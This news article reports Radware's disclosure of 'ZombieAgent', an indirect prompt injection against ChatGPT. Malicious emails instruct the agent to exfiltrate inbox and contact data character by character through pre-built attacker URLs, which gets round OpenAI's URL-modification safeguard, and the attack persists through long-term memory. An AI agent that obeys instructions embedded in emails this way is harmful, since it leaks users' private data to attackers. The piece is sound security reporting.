Artificial Intelligence
Radware bypassed ChatGPT’s protections to exfiltrate user data and implant a persistent logic into the agent’s long-term memory.
January 9, 2026 (7:41 AM ET)

ChatGPT vulnerabilities could be exploited to exfiltrate user data and modify the agent’s long-term memory for persistence, web security firm Radware reports.
Widely adopted across enterprises worldwide, ChatGPT has broad access to internal applications, such as Gmail, GitHub, Jira, and Teams, and by default stores user conversations and sensitive information.
It also includes built-in functionality to browse the web, analyze files, and more, making it convenient and powerful, but also expanding the risks associated with its malicious use.
On Thursday, Radware disclosed a new indirect prompt injection technique that exploits ChatGPT vulnerabilities to exfiltrate user data and turn the AI agent into a persistent spy tool for attackers.
Called ZombieAgent, the attack relies on malicious emails and files to bypass OpenAI’s protections and exfiltrate data from the victim’s inbox and email address book, without user interaction.
In the first scenario detailed by Radware, the attacker exfiltrates sensitive user data via OpenAI’s private servers by sending an email containing malicious instructions for ChatGPT.
When the user asks the AI agent to perform a Gmail action, it reads the instructions in the attacker’s email and exfiltrates the data “before the user ever sees the content”, Radware says.
The email contains a list of pre-constructed URLs for each letter and digit, and a special token for spaces, and instructs ChatGPT to search for sensitive information, normalize it, and exfiltrate it character by character using the provided URLs.
ChatGPT cannot modify provided URLs to prevent the leakage of data by appending it as parameters to an attacker-provided link, but Radware’s attack makes the protection ineffective as the agent does not modify the pre-provided URLs.